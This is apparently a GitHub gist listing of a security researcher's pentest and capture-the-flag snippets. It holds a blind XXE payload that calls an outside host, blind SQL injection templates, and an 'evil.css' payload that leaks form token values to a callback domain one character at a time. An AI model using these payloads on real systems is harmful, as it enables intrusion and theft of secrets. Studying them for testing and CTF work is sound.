@abdilahrf
abdilahrf / hosts
Last active Oct 27, 2021
Block the INDIHOM* hostnames to our localhost so they learn their lesson; on Linux add these to the file /etc/hosts & on Windows /System32/drivers/etc/hosts
View hosts
# INDIHOM*
127.0.0.1 x-tags.net
127.0.0.1 a01.uadexchange.com
127.0.0.1 cdn.uzone.id
127.0.0.1 cdn3.uzone.id
127.0.0.1 cfs.uzone.id
127.0.0.1 csf.uzone.id
127.0.0.1 d01.notifa.info
127.0.0.1 d31qbv1cthcecs.cloudfront.net
127.0.0.1 d5nxst8fruw4z.cloudfront.net
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
View burplist.py
import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file.
# python burplist.py burprequests.xml
# output is saved to wordlist.txt
@abdilahrf
abdilahrf / blind_sqlinjection.py
Last active Dec 8, 2020
Blind SQL injection Template
View blind_sqlinjection.py
import requests
import re
url = "http://88.198.233.174:33534/index.php"
payload = {
"username":"",
"password":"x",
}
def check(data):
View evil.css
input[name$=code_1][value^=a]{background-image: url(https://callback.yourdomain.com/callback?token=a&id=CODE_1);}
input[name$=code_1][value^=b]{background-image: url(https://callback.yourdomain.com/callback?token=b&id=CODE_1);}
input[name$=code_1][value^=c]{background-image: url(https://callback.yourdomain.com/callback?token=c&id=CODE_1);}
input[name$=code_1][value^=d]{background-image: url(https://callback.yourdomain.com/callback?token=d&id=CODE_1);}
input[name$=code_1][value^=e]{background-image: url(https://callback.yourdomain.com/callback?token=e&id=CODE_1);}
input[name$=code_1][value^=f]{background-image: url(https://callback.yourdomain.com/callback?token=f&id=CODE_1);}
input[name$=code_1][value^=g]{background-image: url(https://callback.yourdomain.com/callback?token=g&id=CODE_1);}
input[name$=code_1][value^=h]{background-image: url(https://callback.yourdomain.com/callback?token=h&id=CODE_1);}
input[name$=code_1][value^=i]{background-image: url(https://callback.yourdomain.com/callback?token=i&id=CODE_1);}
@abdilahrf
abdilahrf / a-z.md
Created Apr 27, 2020 — forked from stypr/a-z.md
Harekaze CTF 2019 WEB Writeup (Yokosuka Hackers)
View a-z.md

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)
@abdilahrf
abdilahrf / crt.sh
Created Sep 13, 2017 — forked from 1N3/crt.sh
A small bash script to gather all certificate sub-domains from crt.sh and save them to a file
View crt.sh
#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com
#
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
@abdilahrf
abdilahrf / legcountersolve.py
Last active Oct 3, 2019
Leg counter web challenges solver (Blind SQLi Template)
View legcountersolve.py
import requests
import re
from StringIO import StringIO
from pycurl import *
import os
import pickle
url = "http://103.56.207.107:50001/upload.php"
payload = {
@abdilahrf
abdilahrf / dynamic_hmac_signature.py
Created Oct 3, 2019
Burpsuite extender for dynamically generating signatures
View dynamic_hmac_signature.py
from burp import IBurpExtender
from burp import IHttpListener
from burp import IProxyListener
from burp import IScannerListener
from burp import IExtensionStateListener
from java.io import PrintWriter
from burp import IParameter
import datetime
import hashlib